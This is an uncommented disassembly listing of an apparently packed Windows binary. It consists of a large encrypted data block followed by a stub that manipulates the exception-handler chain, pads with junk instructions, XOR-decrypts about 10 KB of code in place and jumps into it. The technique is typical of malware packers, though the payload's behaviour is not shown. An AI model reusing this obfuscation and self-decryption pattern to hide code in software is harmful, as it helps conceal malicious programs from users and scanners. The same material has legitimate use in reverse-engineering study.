dd 5F3809B9h, 34B6C486h, 6CF562F3h, 40ACA22Eh, 684A13A1h
dd 68D344Ah, 4A9D2833h, 0F565612Fh, 0C05EB96Ch, 0B6CC83A9h
dd 772A4446h, 2278B551h, 42D3481Ch, 2258860Ch, 2A5931F9h
dd 4AE8D815h, 6A3488AEh, 66CBC6C3h, 0B6581DF3h, 0D8F887F8h
dd 82A67B4Ch, 8457C966h, 0FCA0883Bh, 8F73794Eh, 6413C490h
dd 50F8C1C7h, 404A394Bh, 0BF2DD106h, 0D79283Fh, 0B2D534C1h
dd 0CFF90A0Ah, 2C6C09F6h, 0F3998521h, 200BCA1Ah, 0B30F21F4h
dd 0D708F544h, 6503F659h, 67594F15h, 15FCC812h, 0E1C83917h
dd 0CD766F15h, 0D1C35E2h, 427581E3h, 14162E39h, 9E3CFDCh
dd 72D536DBh, 6602D342h, 0D54014B1h, 401AAEBBh, 0DAEE0D6h
dd 0AE94D840h, 1AD9664Ah, 592B698Eh, 0DE9012F2h, 902CD12Bh
dd 64A121C1h, 1AAE0AC3h, 1B0AC5E4h, 4AB91139h, 0D8B5CC02h
dd 0CBF3730Ch, 58187E9Eh, 5964456Bh, 6EB2496Eh, 82B1F0C5h
dd 0F619017h, 94211670h, 0A5449867h, 486D1533h, 4CDDBE0Dh
dd 0BE548014h, 10A3353Bh, 0FA083D45h, 0C8B324A7h, 56CA4649h
dd 33C013D7h, 5071D158h, 3D3BB414h, 3438073Fh, 358AB0BDh
dd 46EF6CF3h, 23A4700Eh, 243C12CAh, 4C78B38Dh, 0B5F43317h
dd 0EA0D1A64h, 0C8590723h, 761261DDh, 901F5434h, 353DBCD1h
dd 98600AA2h, 45CA4D09h, 0C5D8D5B9h, 17D1A687h, 6A04D8E0h
dd 0A1718884h, 60BB6448h, 92928258h, 1C155364h, 12AB69A1h
dd 3C462F39h, 0CF5315ACh, 84CFA226h, 0AD78D31Ch, 0BF53C6AAh
dd 4743581Fh, 4370AB68h, 0DA112E50h, 0A08521A9h, 0A6CC20B2h
dd 0B6725819h, 211A9325h, 7AA11145h, 15A59432h, 8F411B7h
dd 664FFD4Dh, 5720BE23h, 6FBF5022h, 52463F6Eh, 644515A0h
dd 852E0F3Fh, 0D4003212h, 54CAE029h, 5377BE4Bh, 58683421h
dd 0E6B110D8h, 580E215Ah, 87244893h, 37BAD32h, 0A540D88Fh
dd 0A65E5D72h, 9845F237h, 8E4603F3h, 1870444Fh, 0A10634A0h
dd 1AAF24D8h, 88476F58h, 38E2C6C3h, 5D630C84h, 0A9812357h
dd 4F22805Bh, 90BC01F1h, 0D8BCA733h, 0EF6DBA41h, 1414BE99h
dd 0A7BCB204h, 64B7744Ah, 9EED3CA4h, 0D2AB6B8Ch, 0AA6493E0h
dd 35C92ADDh, 0F968E208h, 0A51512B4h, 3576E471h, 0B20F6C64h
dd 5EBF6D08h, 116EAF0Dh, 3EE4B8BCh, 42112650h, 43485A52h
dd 0B405CC6Ch, 0A56A02B5h, 0E7A8CF4h, 0F53D8884h, 0C844450h
dd 0A424AA45h, 0D7689A30h, 48F3D229h, 28DCE7F0h, 9E98AA12h
dd 9258A9Ch, 38346294h, 0CCB4643Eh, 719C3708h, 1B238DC4h
dd 536AEC45h, 68719021h, 52A0210Bh, 5AFF1B14h, 0A96C8553h
dd 7411A66Fh, 0B5C2ADA9h, 0B828111Bh, 89238D30h, 432EF4C4h
dd 38848AC1h, 0A84823D4h, 16929556h, 243237F3h, 630D28C0h
dd 9A4250D8h, 73759619h, 0C912E811h, 1017B12Ch, 74162C14h
dd 5C92FA8Bh, 1E09D3B4h
dd 71A860D8h, 3E51E9B1h, 130C6432h, 551767Bh, 9036940Fh
dd 8A02463Ah, 56BAB84Fh, 8CAC2220h, 0E3B4950Ch, 334789B6h
dd 0AA66732Fh, 114818E2h, 0E11311D0h, 0ECF4AAB2h, 8ED0AA1h
dd 0D44284E8h, 0DD116421h, 0F4F2D24Dh, 9A68D830h, 49D19921h
dd 2913DD08h, 20412C5Ch, 0E3EAD22Eh, 0B6E4226Dh, 0FC13057Eh
dd 0E80822A6h, 9835AD28h, 88528B97h, 30D42FB1h, 76E012DDh
dd 84482605h, 0B7A62BD7h, 0FC941B21h, 97E2D2F2h, 334C92D8h
dd 0E0847015h, 18BCA41Fh, 531680DAh, 7333F869h, 0DBC6A55Dh
dd 0CF4F349Dh, 0BC458B0Fh, 0B346C8C3h, 8FC116D3h, 4677565Bh
dd 0BDF22842h, 3CFD3A30h, 5B1938A0h, 0FBC5454h, 0A2C3A0C2h
dd 0BCFDF133h, 64609EDBh, 756F5FB9h, 422CFACDh, 360AAE29h
dd 8B2D4806h, 48A7AC71h, 8D8ED7BDh, 681682CDh, 0B2ED7083h
dd 2BAFAD8Ah, 0C9C5B17h, 469D8344h, 0D7B5C540h, 79D85B29h
dd 0E34558C8h, 0CDF60A26h, 3BB4B951h, 256D180Dh, 3A72EC54h
dd 0C99E11B7h, 91114990h, 7C7C4852h, 39F236E5h, 17FB0E08h
dd 65788B43h, 277D046Fh, 142CA573h, 49A4178Dh, 9A448EEh
dd 0DE52A5ABh, 0BCBCB04Ch, 58D7AA47h, 0D469B839h, 231497A0h
dd 0E9B3C43Fh, 8D75309Ah, 1ED29230h, 5487C5B1h, 3F490995h
dd 440DD29Fh, 0EC8A15CFh, 1837F419h, 0B7B95428h, 45B5770Ah
dd 0F256AB4h, 0E62590F8h, 40E3EE1Bh, 78DC1022h, 0C5391783h
dd 57459D54h, 5071C1D6h, 13002AA0h, 6BFA95Bh, 3115A3B5h
dd 0BD14A81Eh, 3F510869h, 884ABBA0h, 58F6B840h, 3BFBC5F6h
dd 63AC491Ah, 0CC0E412Fh, 0BE0769DAh, 0CEB81057h, 95BBD3D2h
dd 0ACC40F4Bh, 9FCAD811h, 2AD7C50Ch, 4C936A5Ch, 0A4541D3Fh
dd 484C20E3h, 0B4271740h, 38DFBE6Eh, 0C34B39A4h, 0A8C2ACB0h
dd 29B74690h, 18BAB540h, 0A8C31689h, 1BBC1BB1h, 21C59958h
dd 5B42B268h, 89CD9762h, 7C05205Bh, 8C33E2EEh, 12775B74h
dd 0DC4DF435h, 16F5D0AFh, 63C04B0Eh, 1F6FF8A8h, 0B6533244h
dd 0D9FA55A0h, 48E8361Bh, 14FBEC22h, 90F04AFDh, 8F693DBFh
dd 0E87AD191h, 0B2A24CEh, 794B3D34h, 16756ADh, 0B4D6CEDBh
dd 9467BD30h, 4D163504h, 0A04D6DCFh, 595C12D2h, 8286F9BEh
dd 8B0D1107h, 0C39590F2h, 0D20EA4ADh, 0D45CE0A1h, 571218A2h
dd 78455D5Ch, 14C52B38h, 80D339Dh, 94C3F00Ah, 533C5134h
dd 59BD392Dh, 49D02E3Bh, 0B8070466h, 80302861h, 639E8C42h
dd 867DC33Bh, 3F4EC023h, 4EC4C442h, 902B422Bh, 473C9E80h
dd 0C4508C21h, 0C076844Eh, 30F6EF86h, 0B293A0DAh, 2335591Ch
dd 5973562Bh, 497FD9Eh, 19A1E8E3h, 0ABA7FC6Eh, 9F99AE62h
dd 884C26E0h, 755B8B9Ch, 48CCB659h, 0DA5B84E8h, 0EA0599Dh
dd 0A41C9DF3h, 71DC96CAh, 55EA535Eh, 0D2A0F088h, 0C4F92983h
dd 7583A384h, 0AEDD5841h, 0C516456Eh, 2C623495h, 628CE31Ah
dd 3C3327BBh, 295B991Bh, 88886D4Ah, 0B0CA3BCh, 0D94C99C4h
dd 3224EF87h, 0D1ECAA1Dh, 0DE37B8D9h, 51430B2Eh, 3A619EE6h
dd 30643899h, 0BE333972h, 0A8B29A0Dh, 0FAC18F27h, 0BC35D95Bh
dd 166C9465h, 47A5989h, 0E0C1C6B4h, 0DFA57258h, 836313E4h
dd 92C75B34h, 0C92992AFh, 15B6A1F0h, 0B8145040h, 8EB22F58h
dd 44B44DECh, 1F58E6D9h, 1DB667C5h, 48252AF8h, 46C8444Ah
dd 0B019855Bh, 9196960Bh, 0A1EB7D40h, 8B470F61h, 96A3C5F2h
dd 25F74231h, 578972B4h, 8A4CC4EEh, 0EC219577h, 44E4815h
dd 804596A3h, 0DC4C5242h, 627C5ABCh, 0D8204864h, 11938FC9h
dd 0A392B348h, 123AA011h, 1E2CBAC5h, 62E4B15Dh, 0D802B3A8h
dd 5853B0B8h, 25AA8B4Ch, 8C558857h, 0FC367797h, 594D42AFh
dd 47C8893Ah, 31B90D85h, 0C616020Ch, 0D8520344h, 0DF1B5F28h
dd 0D2ACF30Dh, 60088C05h, 3D3B88C4h, 0F4A90CA3h, 1E92C6B1h
dd 2AEDAAF8h, 0B19FD972h, 3E166829h, 0AE044045h, 0C5B30603h
dd 5CA429A2h, 922218Fh, 7D7AB858h, 1B16184Bh, 0B4D360B3h
dd 0AB4F8CE0h, 0C197DB8Ah, 144A70B7h, 0A2341772h, 124A0C5Eh
dd 0B570060Ch, 0A37F5934h, 33C0D7FCh, 0EEC4A050h, 4888D82Ah
dd 924A5C21h, 0A63B601Ch, 16A584D8h, 0DFD5A549h, 80481364h
dd 41975C94h, 134CBC1Dh, 0DD8AE558h, 0E0308F5Bh, 4DD758BCh
dd 9B145B9Bh, 31BCB244h, 9C4A1A4Ch, 5B419F7Bh, 0B44D01Dh
dd 30A5BD31h, 8D65633Ah, 22141B46h, 0DB3091CCh, 19107FD4h
dd 0C411FAF1h, 98957BB2h, 49703363h, 482963B4h, 35164957h
dd 188ADA29h, 4710FFA4h, 425C7A50h, 0B006404Dh, 590A53B1h
dd 16224108h, 29097656h, 0D61726F0h, 9EBD0332h, 980D8414h
dd 779D8431h, 7F074C96h, 0BA0DDB3Ch, 1C0E39D6h, 58333318h
dd 6702E80h, 0B34CFD06h, 0CCF3278h, 0B297945Bh, 6BC9E6ACh
dd 97465124h, 35441FD8h, 776AA122h, 0C22C20DDh, 24219990h
dd 0DDD9EF96h, 948AA129h, 983C923Ah, 0A384204Eh, 45F8FF6Ch
dd 91FCBCF8h, 68FC880Eh, 52E05110h, 80A84439h, 45F0C412h
dd 5F2E9D5Bh, 0B64E4411h, 8CA9BB6Ah, 102AF4DAh, 5582784h
dd 55775041h, 9EF7E80Ch, 31157C98h, 195482B1h, 55E2601Eh
dd 9692453Bh, 6B2A376Ch, 57688519h, 5064680Ch, 3DCBB254h
dd 0C4F05F1Ah, 38444F9Eh, 0D68C956h, 0A09C0C68h, 2A0C468Bh
dd 296C745Bh, 9629EA98h, 4F337281h, 0B867D088h, 0A0AA2658h
dd 569A13CEh, 265A5A42h, 0BAB50DDDh, 0E27D4329h, 2D7A6564h
dd 0D26B3864h, 0B2075B69h, 0D61A0668h, 5497205h, 6CD9F644h
dd 0FC249359h, 0E29C8C44h, 0F9684C12h, 5BEC8644h, 60747C64h
dd 0F485A34h, 9BAB3A11h, 76736014h, 70DF8426h, 90EEFDDFh
dd 5B21E2BEh, 3376D964h, 9C3B7871h, 0B2A4AD95h, 0F2B10F2Dh
dd 0F47F2905h, 0A1761A9Fh, 176678B1h, 7138408Bh, 72D6B577h
dd 804D2A8Eh, 0E297B320h, 0DAF90094h, 5A3DE9BBh, 430F430Dh
dd 8B95D615h, 0E2D83F1Fh, 0D3B3DA0Bh, 0CFEB307h, 63F9B273h
dd 75E0351Ah, 4CE4E40Bh, 28089574h, 0D6E0970Ch, 0C5F42EFh
dd 3E618C8Dh, 8B942C08h, 24D84021h, 0AD3BEAE9h, 95E24B09h
dd 895ACF04h, 5C22974Dh, 108442E6h, 4B187D4Dh, 0B4D7B269h
dd 25956510h, 83BAA09Ch, 5BD8357Eh, 0E6765482h, 0AD86EB70h
dd 0D98B072h, 5CB17428h, 2A18AAA3h, 79083078h, 7A1BCAB6h
dd 15856039h, 25265C97h, 469CA39h, 7623249Ah, 0F2029EBh
dd 0E02844B2h, 2A4370B2h, 2E21B949h, 0A32C1132h, 196CF527h
dd 0BFB66D09h, 55A4F56Eh, 0CA766B6h, 81546840h, 90640C7Ch
dd 383535E5h, 0A47FC25Dh, 23B6A994h, 133E3543h, 10A35B2Dh
dd 0E14C1EA4h, 271510B4h, 3B5485B1h, 39D6350Bh, 8E32BCCEh
dd 0B1A8F874h, 42198C5Eh, 56FDA425h, 94432B1Ah, 90152421h
dd 0B1738523h, 44843C48h, 907008A4h, 45DDC8A0h, 2C0E6298h
dd 14AA2791h, 0E154C916h, 0E126A651h, 0D4228E63h, 5870D912h
dd 12EAB45Ch, 0B20430CBh, 0A8B1895Ch, 0E6EA487Dh, 8EF1506Fh
dd 8B4A58B1h, 0CFC332A8h, 0A88D3326h, 0B5C6C562h, 7D1A213Dh
dd 84A8228h, 0C39EC0Ch, 4FC32459h, 5C9B5158h, 5A8BE8C5h
dd 0E20A7553h, 35BF0B24h, 8D31937h, 81987460h, 71310750h
dd 5693BA58h, 0BC1B32B8h, 0FB1D6F10h, 0E821A373h, 0B419D4BFh
dd 6E0D808Ch, 0BD6C1749h, 86A75F38h, 0BF4C480Dh, 12060551h
dd 95A6A446h, 37822008h, 0E4EAFA4Eh, 8473C9Ch, 4CAC79C8h
dd 432F5810h, 0EF432553h
dd 0C94AD3F7h, 0BC6B303Dh, 0C4C2B225h, 76077C0Fh, 614C5CB3h
dd 0AC99A5D6h, 0F89C0A0Ah, 5B531077h, 0B0491F6Ch, 0B51A6DC4h
dd 0FCB62433h, 0AD04A05Eh, 51C85131h, 145DFBB3h, 5D47201Ch
dd 0F1D60F60h, 7E222AA6h, 0A6300FACh, 0B8D81204h, 0E263B2F9h
dd 39B03438h, 29C8484Fh, 3BB2B340h, 4E43B8C4h, 2CB3A2F1h
dd 4EBA8403h, 4DB6DA4Bh, 30CE7841h, 0FBCAB25Eh, 0C5C645A0h
dd 0F8A5292Ch, 0A20FA742h, 59D19CD2h, 75B27728h, 141A8BBDh
dd 0D90C4FFCh, 39932E65h, 282F2AD8h, 3CA8522Eh, 74293BE2h
dd 2028CC0Eh, 8441EB6h, 0B7D5F994h, 0C920664h, 128692EDh
dd 3DBDA825h, 0C34B8C94h, 24695BB2h, 3F657C5Ah, 0B61CB931h
dd 1B7B02C4h, 0DC50363Ah, 88CA7E82h, 9939CA70h, 42EC68Ch
dd 0F0A3D613h, 0A4E192CCh, 38F38D2Bh, 0B308298Eh, 71013D9h
dd 15BC853Ch, 35B44871h, 70373C59h, 0FF466932h, 0C2508B60h
dd 0B7C159B5h, 9B14DB2Ch, 741B55B9h, 0B098295Fh, 4713A74Bh
dd 0D95D2242h, 643D6825h, 37E09140h, 0D813F3C4h, 12238A45h
dd 3381CAA9h, 12981229h, 0AF51DE1Eh, 11A61299h, 5E7E8D4Ch
dd 14BBD499h, 0DE280B45h, 0AC3C504Bh, 51C2FADAh, 0B1060C08h
dd 6976741Eh, 24AC21A4h, 0C9641297h, 5A2FDAB5h, 74B6010Fh
dd 2859EFC3h, 0A179FBFAh, 0CFE06C10h, 77BECE05h, 4AADAC35h
dd 25825B87h, 0BD1F689Eh, 0BA0530AFh, 1176BCC5h, 5B9016F2h
dd 3EAB1122h, 8AE3A144h, 88495DF6h, 58042158h, 67A45D46h
dd 8A32C8C4h, 189A14A1h, 0BFB5D0CDh, 8EA1791Ah, 6EBCC04Fh
dd 2CAAB334h, 0CB9EBCFEh, 906A7049h, 29145B36h, 4253BC10h
dd 0B4D53A1h, 66A16C23h, 0E0143629h, 4C136415h, 20D88E58h
dd 9088DDB1h, 1021F24Eh, 8B50A658h, 9926590Ch, 3C01087Fh
dd 0B29D3DA0h, 4BC27077h, 7C41B4ACh, 60078C54h, 643E9C43h
dd 0BC6810C3h, 0C2706CCFh, 11AB4450h, 5818C654h, 5C218668h
dd 0C40887Ch, 0A7084467h, 80768E4Ah, 24CC33F8h, 13F27835h
dd 1BE5C6ABh, 5801E6EDh, 0E1784136h, 3C5AB5C9h, 645FB472h
dd 41A8B438h, 2FC22BB2h, 6D2B2B4Dh, 0A0F2DE4Ch, 0E56BF9BEh
dd 0A1449FDAh, 97C94C6Bh, 0AB2BD3CAh, 32CBA5C4h, 8C3C524h
dd 0DC424D58h, 580817FDh, 0BC46564Dh, 13B31C11h, 54E2AC7Ch
dd 0BB348996h, 0C4054262h, 0A08D890h, 270E051Ah, 35145D6Ch
dd 6B204CE4h, 44BE6E0Ch, 0A42BD8F8h, 5090ADB2h, 5BD15882h
dd 74723456h, 284C2552h, 8262878Eh, 2E4E404Eh, 43D6F2F4h
dd 2CD84C8Bh, 0E81ECF65h, 0A4CAF3F3h, 8C586110h, 320CAD6Eh
dd 89361688h, 854925E0h, 6FCA9D2Bh, 3443F83Bh, 29F9CF5Bh
dd 9445878Dh, 5C3C7908h, 7385BC42h, 54EA216Dh, 7E19634Dh
dd 2969A120h, 0E43D9D5Bh, 36226FC8h, 0C6B82F8Dh, 1E29E7F2h
dd 0E0E04AB1h, 9884A62Eh, 0F6154A21h, 58B8058Eh, 5CE35A8Ah
dd 0EB563DC8h, 0B68E040Ch, 4E38FD37h, 0B6A64EB4h, 0E8453FFh
dd 0C2B970AFh, 11B4463Eh, 0BBB4A63Ch, 89CF7B51h, 89E341B1h
dd 4E2442Bh, 0ADA6B8A8h, 8881CF2Eh, 0A2DC5460h, 509CB517h
dd 4AD888A1h, 69B8A78Fh, 80844AD0h, 73503306h, 0B57032B3h
dd 2B160424h, 0E9205861h, 5B4CD2C1h, 58688A1Dh, 628A7772h
dd 7AD16E5Ch, 5C8B0FCAh, 33E9C39Dh, 0E0428501h, 444E2640h
dd 0DA628300h, 4147E9AAh, 0D1723318h, 29243859h, 588908B5h
dd 35C4035Bh, 0B0323476h, 9A825EBEh, 0A335B38h, 0D1C86623h
dd 6880BE0h, 213EE0C4h, 22916768h, 83D69E0h, 82D44E78h
dd 0D1CC7E1Ah, 51B72213h, 63BD4DF5h, 0BC022226h, 0BE06A8Eh
dd 9CC54A1Ch, 25AF589h, 0F94ADCEAh, 0B35CC5B4h, 89F95279h
dd 12E5E79Ch, 2EB7B2DEh, 35C80578h, 41A80EB7h, 3EAC54D8h
dd 3F59BFCEh, 4A6AC2D6h, 883506Ch, 0A9503D48h, 3D082695h
dd 0BC716821h, 0FDC4B50Ah, 0D438D59Dh, 0E3CE773Fh, 0BA4888BBh
dd 438C7844h, 3954C860h, 283E5EE2h, 0B366E256h, 65979C20h
dd 262D2476h, 0F6C90FDCh, 0B4821BD4h, 0FEBA6DEEh, 0D2568810h
dd 0C8C5ED40h, 451AE8AEh, 505447E8h, 423F1AF0h, 859C9C5Bh
dd 8129B55h, 0E052F06Bh, 586B4230h, 55081A77h, 0BA927559h
dd 9C59CF02h, 0B114974Ah, 0EF65D19Eh, 98B2FFB8h, 1675C6CAh
dd 92995CF9h, 16A08C4Fh, 0BC8F554Bh, 0F6B1C911h, 4013BDB8h
dd 4F31EAE4h, 0C17355C9h, 0FC59B781h, 0F0CD3AB1h, 0A9D3C363h
dd 594888F0h, 3E2A068Eh, 0DD4FADB4h, 11A14F79h, 8904D44h
dd 0A1531E46h, 995D59C7h, 3A5249D6h, 67AB8550h, 0CB4B21CFh
dd 0A4215818h, 1E0EE8A5h, 4015330Bh, 0C6BCED73h, 0CFB8677h
dd 8E12F96Ch, 0C5854290h, 0E498CD14h, 3DCFE453h, 40342F45h
dd 981DAE50h, 292B8440h, 81D175Bh, 0B0643476h, 934940E6h
dd 28BDF246h, 0AACA33Dh, 0AD98D84Ah, 8BDF3E17h, 749E540Fh
dd 9337128Bh, 0A1194FFEh, 4C17239Fh, 0B41A6F3h, 0A5D8DCFBh
dd 275C50D5h, 0C542A190h, 0A5391AEFh, 0BB753244h, 868F76FDh
dd 883237D0h, 0F4A93D8Bh, 0B417A130h, 0CAE2F360h, 0A44577FDh
dd 14442032h, 64CE5841h, 5B9D4208h, 543A1BD2h, 323B4519h
dd 2833589Ah, 0EA34404Ch, 163653D8h, 0D8955198h, 23125FFFh
dd 544CE8B1h, 0EB0A8BBDh, 17E2F4D4h, 8A8B9B7Ah, 3F6389CCh
dd 1597B2C2h, 5BE19791h, 0D7654B0Ah, 40B094F2h, 63A7FCCDh
dd 232B9044h, 0F769C990h, 17C932A1h, 0ABE2B760h, 0E9161589h
dd 0AD3060FDh, 0ACC0AB83h, 442D9BE7h, 0BF8B91C5h, 72969234h
dd 0D0A38904h, 0E77BCC23h, 9D6C8345h, 398D64C4h, 59989EE8h
dd 2D953270h, 45AE45FCh, 0CB8B5940h, 1C8D25BCh, 35B917FEh
dd 0AF8C5732h, 0FCF5705Dh, 9B86C980h, 2A1FA55h, 0D4AF298Dh
dd 605494A9h, 79DBB264h, 68B22564h, 0CD1E4F5Bh, 119DA17Bh
dd 28A8590Bh, 0FC59F293h, 0E6221122h, 0F77739B7h, 0B4CC8DD8h
dd 1F8E4629h, 0B903B176h, 2804F577h, 0B78F3295h, 602D2413h
dd 0E6674BDFh, 34D81851h, 5BF53D25h, 61578E08h, 636B581Bh
dd 90A27C69h, 5441A858h, 0B1560D85h, 58BFCC0Dh, 0C47ADB96h
dd 0E3A05ACEh, 0A09679F1h, 4439D862h, 900824A2h, 5E586207h
dd 5180D85h, 2291F805h, 6E116C12h, 7A39F209h, 50F53810h
dd 8CCD3039h, 0DA1C480h, 0EE869581h, 444AE0BFh, 0B4A6BF88h
dd 92024AB9h, 8C58E248h, 5CDA3126h, 9229178Eh, 7F3B113Fh
dd 0A829D07Fh, 0CC110F93h, 510507Dh, 7D12A630h, 0B602D3DAh
dd 982E9418h, 91BDC5BCh, 35413257h, 99BB5B22h, 0EDA4DF0Dh
dd 29B81388h, 15781D60h, 906E071Fh, 0CCDBABB2h, 4596A294h
dd 8237B47h, 66BCFCB5h, 2094E825h, 16BBB6ECh, 59EECB2Dh
dd 0DE95936Fh, 0CD3C1841h, 2CDC995Bh, 353AC30Ah, 28215EF4h
dd 5284CC83h, 9817C036h, 38F82194h, 0AD58104Ch, 11E6B96Fh
dd 60BE45BEh, 0AF409CE8h, 0A68075D8h, 0B1583497h, 0D65AD239h
dd 0DCE48857h, 44203816h, 5408F1DAh, 509BA9D4h, 2F3328B5h
dd 5DE9D070h, 940D56B3h, 2E6E192Ah, 392140FDh, 0BDDF3435h
dd 219806AAh, 26B8BA34h, 0BCF00C30h, 910DA5B4h, 128CA280h
dd 21859A6Bh, 9162F59Eh, 0DB4532A2h, 3808B3CDh, 80884C42h
dd 0C88859A5h, 94B77622h, 0B46C2997h, 316844F7h, 96084B98h
dd 1E3E6E42h, 8C94D945h, 4520D80Dh, 29A89F08h, 659811DCh
dd 17050592h, 31F16458h, 0D579170Bh, 0E1DF2A5Bh, 0C2AD2008h
dd 45346D67h, 6BB635B4h
dd 0A934142Dh, 0A6C337A0h, 23D351Bh, 31347740h, 42F05388h
dd 0F2A26D5Bh, 661195D0h, 31F42003h, 409B47Eh, 4AD02FA9h
dd 38647713h, 8D2B32D9h, 37423109h, 534C883Ah, 0D2DAA2CDh
dd 0E98A9424h, 0CBFA5B19h, 0B8C89D30h, 0EE7FB3DEh, 67A95773h
dd 57B3288Bh, 6BB2254Bh, 0DE05759Ah, 440ACC92h, 0EC88B399h
dd 0B24BC8A0h, 989344FCh, 0B3EC95E9h, 38540C1Bh, 0E07C39h
dd 406B39h, 40103844h, 52454B07h, 334C304Eh, 64382E32h
dd 8001F06Ch, 43746547h, 0B3C77275h, 0B150BB6Eh, 73F5636Fh
dd 432633C7h, 0A7F7611Ch, 6F6DC352h, 68540C19h, 289D641Bh
dd 1A69DA57h, 0BF4D2219h, 2879B135h, 74D86956h, 6C611B75h
dd 2E198E41h, 44207845h, 69F570F5h, 48773AEBh, 6DB86E37h
dd 0C63EB23h, 3669461Ch, 4CAD410Ch, 3C1A7357h, 469E6657h
dd 0FE53768Ah, 4F1EC367h, 63A36A62h, 78B34FDh, 1E644162h
dd 4CCF88D4h, 69A1F49Bh, 0DAB6F762h, 91A94156h, 55498E94h
dd 86573714h, 73776FB0h, 798CA344h, 6C2AA989h, 0ACDCCFFBh
dd 0CA34A46Eh, 0BF94678Ah, 7DC044A8h, 30536C76h, 33CD73E3h
dd 910D6D46h, 0F04E0B08h, 0A7745778h, 88A0F41h, 0C8107372h
dd 0B47015D9h, 0CF76E676h, 6D0D6F28h, 33450AFDh, 37628247h
dd 1AF246B4h, 680BCA0Ch, 0A549277h, 0C427024h, 4168614Eh
dd 53485391h, 63655F67h, 46090F11h, 1314184h, 0F5436BA6h
dd 2DC0A375h, 0D0A36D2Bh, 159EECBDh, 65E8A049h, 67753862h
dd 3C726DF5h, 2D94EE38h, 9331A7A5h, 75E16F4Dh, 687CCEA1h
dd 7970893Fh, 0E7531039h, 5A9C1E41h, 0D6533F2Fh, 0D9AB7FECh
dd 733ABA68h, 62DA8A20h, 64BB1C2Bh, 9D78334Dh, 8424FF52h
dd 7A358945h, 67691D22h, 30373537h, 70795466h, 0BD5338A1h
dd 0FFE0F97Ch, 0A7EC03C9h, 89F95575h, 0A4731476h, 81B7AC63h
dd 0DF20685Fh, 64706E55h, 0CD1929BFh, 0DE47FEB2h, 6921DEA3h
dd 0B320F8A9h, 194D2ECCh, 0A4677961h, 6E1AC628h, 7901275h
dd 7D9C7049h, 77016641h, 5700110Ch, 5F473253h, 9080366h
dd 630E1344h, 49413080h, 16749C2Ah, 0A3330A44h, 6B0D9412h
dd 1484DE96h, 9034C14h, 12058912h, 480F2411h, 22729102h
dd 30C4501h, 9220901h, 16964407h, 7D470B89h, 4187F40Ah
dd 50325644h, 90F69449h, 9FE98338h, 4924E85Ah, 434DC620h
dd 58351A1h, 14591FAEh, 4FCFFA68h, 1C6ED47Dh, 43840ED1h
dd 4B78C44Dh, 3B1472E0h, 5C9B1F86h, 0C56A15C8h, 0D16D0C68h
dd 8F549631h, 6567C0C3h, 2D7244C4h, 0FE3C0973h, 67F6764Ch
dd 0EDA33EACh, 0E9BF66E3h, 4CCEF61Bh, 55AE6CFAh, 3E7B87D1h
dd 3379294Bh, 0AB413278h, 56F92624h, 64751EFCh, 241021B5h
dd 0FE6BCD32h, 756398B8h, 49FC3EBAh, 3C6F66C9h, 685E9107h
dd 443BEA10h, 534D44E4h, 434F9080h, 0C3A934Bh, 73F47254h
dd 0A6696D26h, 801C6Dh, 0
dd offset dword_406B38+1
aLoadlibrarya db 'LoadLibraryA',0
aGetprocaddress db 'GetProcAddress',0
dd 3 dup(0)
dd 700C00h, 6DDAE900h, 0FFFFh, 200h, 700C00h, 31Eh dup(0)
db 87h, 0DBh
; ---------------------------------------------------------------------------
cmc
push ebp
mov ebp, esp
call loc_40A018
stc
clc
call sub_40A0C1
clc
jmp loc_40A041
; ---------------------------------------------------------------------------
loc_40A018: ; CODE XREF: __u_____:0040A006�p
push dword ptr fs:0
mov fs:0, esp
xor ds:dword_40A043, ebp
mov eax, eax
xor edx, edx
push edx
push 10000h
push edx
push edx
push edx
push edx
push edx
push edx
push edx
call ds:dword_40700C ; LoadLibraryA
loc_40A041: ; CODE XREF: __u_____:0040A013�j
stc
; ---------------------------------------------------------------------------
db 0BDh
dword_40A043 dd 12FFC0h db 8Bh
dd 6467F875h, 3689h, 29DB87F9h
db 0C0h
; ---------------------------------------------------------------------------
loc_40A055: ; CODE XREF: __u_____:0040A05B�j
dec al
or al, al
jz short loc_40A05F
jnz short loc_40A055
; ---------------------------------------------------------------------------
db 0EBh, 67h
; ---------------------------------------------------------------------------
loc_40A05F: ; CODE XREF: __u_____:0040A059�j
clc
stc
cld
sub esi, esi
sub ecx, ecx
cld
xchg ebx, ebx
mov cl, 2Dh
xchg ebx, ebx
xchg ebx, ebx
jmp short $+2
loc_40A071: ; CODE XREF: __u_____:0040A076�j
lea esi, [esi+1]
clc
dec ecx
jnz short loc_40A071
cld
call sub_40A094
stc
mov edx, edx
; =============== S U B R O U T I N E =======================================
sub_40A081 proc near ; CODE XREF: sub_40A094:loc_40A0AA�p
mov al, [ebx]
mov ecx, ecx
cld
nop
nop
xor ax, si
clc
cld
clc
xchg al, [ebx]
stc
stc
retn
sub_40A081 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40A094 proc near ; CODE XREF: __u_____:0040A079�p
pop ebx
nop
sub ebx, 0FFFFFFAAh
mov edx, 29CCh
mov ebx, ebx
xchg ebx, ebx
mov ebx, ebx
push ebx
stc
clc
loc_40A0AA: ; CODE XREF: sub_40A094+21�j
call sub_40A081
nop
inc ebx
dec edx
nop
or edx, edx
jnz short loc_40A0AA
pop ebx
cld
cmc
leave
jmp ebx
sub_40A094 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 89h, 0C9h
db 87h, 0DBh
; =============== S U B R O U T I N E =======================================
sub_40A0C1 proc near ; CODE XREF: __u_____:0040A00D�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_40A0C1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
stc
jmp short $+2
mov ecx, ecx
loc_40A0D4: ; DATA XREF: __u_____:0040D3DC�o
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_40A121
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_40A115
mov ebx, [eax+29C1h]
jmp short loc_40A11F
; ---------------------------------------------------------------------------
loc_40A115: ; CODE XREF: __u_____:0040A10B�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_40A11F: ; CODE XREF: __u_____:0040A113�j
mov ebx, [ebx]
loc_40A121: ; CODE XREF: __u_____:0040A0F3�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 0D60h
sub ebp, 101005h
mov edi, [esp+4]
